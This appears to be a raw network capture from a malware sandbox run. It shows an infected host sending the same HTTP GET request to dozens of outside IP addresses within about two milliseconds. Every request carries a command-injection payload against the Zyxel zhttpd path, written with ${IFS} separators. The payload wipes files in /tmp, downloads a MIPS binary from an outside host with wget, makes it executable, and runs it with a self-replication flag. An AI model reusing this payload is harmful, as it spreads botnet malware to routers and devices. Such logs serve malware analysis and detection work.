                                        Jan 14, 2024 16:18:42.395783901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3600192.168.2.134150839.146.129.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395801067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3601192.168.2.1338952170.186.109.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395842075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3602192.168.2.1343208123.174.28.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395912886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3603192.168.2.134056223.84.184.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395932913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3604192.168.2.1339798199.51.246.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395945072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3605192.168.2.1340592212.28.73.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395967960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3606192.168.2.1349596217.137.7.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396018028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3607192.168.2.1358854133.237.42.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396061897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3608192.168.2.134682036.60.234.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396092892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3609192.168.2.1353028139.42.25.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396120071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3610192.168.2.135370812.71.90.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396142006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3611192.168.2.135462675.41.95.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396194935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3612192.168.2.1338132137.86.170.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396231890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3613192.168.2.1333116135.32.187.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396280050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3614192.168.2.1337124103.8.226.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396333933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3615192.168.2.1360956126.221.186.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396361113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3616192.168.2.135250070.245.217.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396416903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3617192.168.2.1354336135.69.50.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396446943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3618192.168.2.1338566196.210.45.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396493912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3619192.168.2.133409263.170.179.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396542072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3620192.168.2.1346636190.176.31.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396569967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3621192.168.2.1346374168.225.29.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396599054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3622192.168.2.1358274102.28.126.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396653891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3623192.168.2.135162812.104.166.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396676064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3624192.168.2.1344460152.64.165.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396718979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3625192.168.2.134615645.199.117.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396755934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3626192.168.2.1341984123.102.121.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396787882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3627192.168.2.1346812104.24.0.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396840096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3628192.168.2.135514480.34.70.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396874905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3629192.168.2.1343454130.36.145.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396986008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3630192.168.2.1341572120.111.94.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.396996975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3631192.168.2.135753652.182.2.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397063017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3632192.168.2.1358068101.203.182.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397103071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3633192.168.2.1348578202.100.179.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397145033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3634192.168.2.1333074216.183.190.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397178888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3635192.168.2.1337306103.178.248.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397208929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3636192.168.2.1350764160.89.192.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397238016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3637192.168.2.1356976124.137.100.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397286892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3638192.168.2.1337448209.163.64.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397339106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3639192.168.2.1341270184.194.228.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397387981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3640192.168.2.1351892187.243.74.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397439957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3641192.168.2.1349992184.94.249.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397476912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3642192.168.2.135896280.107.5.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397521019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3643192.168.2.1357080208.222.126.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397557974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3644192.168.2.1353150104.97.173.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397605896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3645192.168.2.135561636.40.13.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397656918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3646192.168.2.1345934121.178.47.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397706032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3647192.168.2.133534452.236.241.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397747040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3648192.168.2.1357280162.53.134.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397804976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3649192.168.2.1350122204.37.135.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397855997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3650192.168.2.133809486.247.79.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397907972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3651192.168.2.1351166116.103.76.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397938013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3652192.168.2.134838449.145.80.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.397986889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3653192.168.2.1354392181.243.90.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398021936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3654192.168.2.1338886174.106.173.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398062944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3655192.168.2.1358666117.49.173.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398106098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3656192.168.2.1336796138.138.60.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398153067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3657192.168.2.133693475.67.81.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398176908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3658192.168.2.1343396221.227.162.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398232937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3659192.168.2.135198018.236.48.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398273945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3660192.168.2.134178859.24.66.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398304939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3661192.168.2.135112212.71.16.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.398353100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3662192.168.2.1339528177.250.2.118443
                                        TimestampBytes transferredDirectionData
